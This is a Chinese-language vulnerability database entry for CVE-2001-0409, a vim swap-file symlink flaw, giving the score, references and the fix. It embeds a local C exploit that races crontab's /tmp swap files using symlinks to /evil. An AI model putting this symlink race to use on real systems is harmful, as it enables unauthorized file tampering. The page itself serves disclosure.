CVE-2001-0409
CVSS2.1
发布时间 :2001-06-18 00:00:00
修订时间 :2008-09-10 15:07:55
NMCOE    

[原文]vim (aka gvim) allows local users to modify files being edited by other users via a symlink attack on the backup and swap files, when the victim is editing the file in a world writable directory.


[CNNVD]vim(也称为gvim)漏洞(CNNVD-200106-102)

        vim(也称为gvim)存在漏洞。在受害者编辑全域可写目录文件时,本地用户可以借助对备份和是swap文件的符号链接修改正被编辑的文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0409
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0409
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-102
(官方数据源) CNNVD

- 其它链接及资源

http://www.calderasystems.com/support/security/advisories/CSSA-2001-014.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2001-014.0
http://xforce.iss.net/static/6628.php
(UNKNOWN)  XF  vim-tmp-symlink(6628)
http://www.novell.com/linux/security/advisories/2001_012_vim.html
(UNKNOWN)  SUSE  SuSE-SA:2001:12

- 漏洞信息

vim(也称为gvim)漏洞
低危 未知
2001-06-18 00:00:00 2005-05-02 00:00:00
本地  
        vim(也称为gvim)存在漏洞。在受害者编辑全域可写目录文件时,本地用户可以借助对备份和是swap文件的符号链接修改正被编辑的文件。

- 公告与补丁

        

- 漏洞信息 (20967)

Vim 5.x Swap File Race Condition Vulnerability (EDBID:20967)
linux local
2001-01-26 Verified
0 zen-parse
N/A [点击下载]
source: http://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file.

By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. 

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

/*******************************************************************
 #define SAFER [1000]
/*******************************************************************/
int shake(int script kiddy)
{
 int f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r"); 
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

main(int argc,char *argv[])
{
 int p;
 char v SAFER;
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x

		

- 漏洞信息

5645
Vim Backup / Swap File Symlink Arbitrary File Modification
Local Access Required Race Condition
Loss of Integrity
Exploit Unknown

- 漏洞描述

vim contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when vim writes backup and temporary files to /tmp.

- 时间线

2001-01-26 Unknow
2001-01-26 Unknow

- 解决方案

Upgrade to version 5.7.71 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站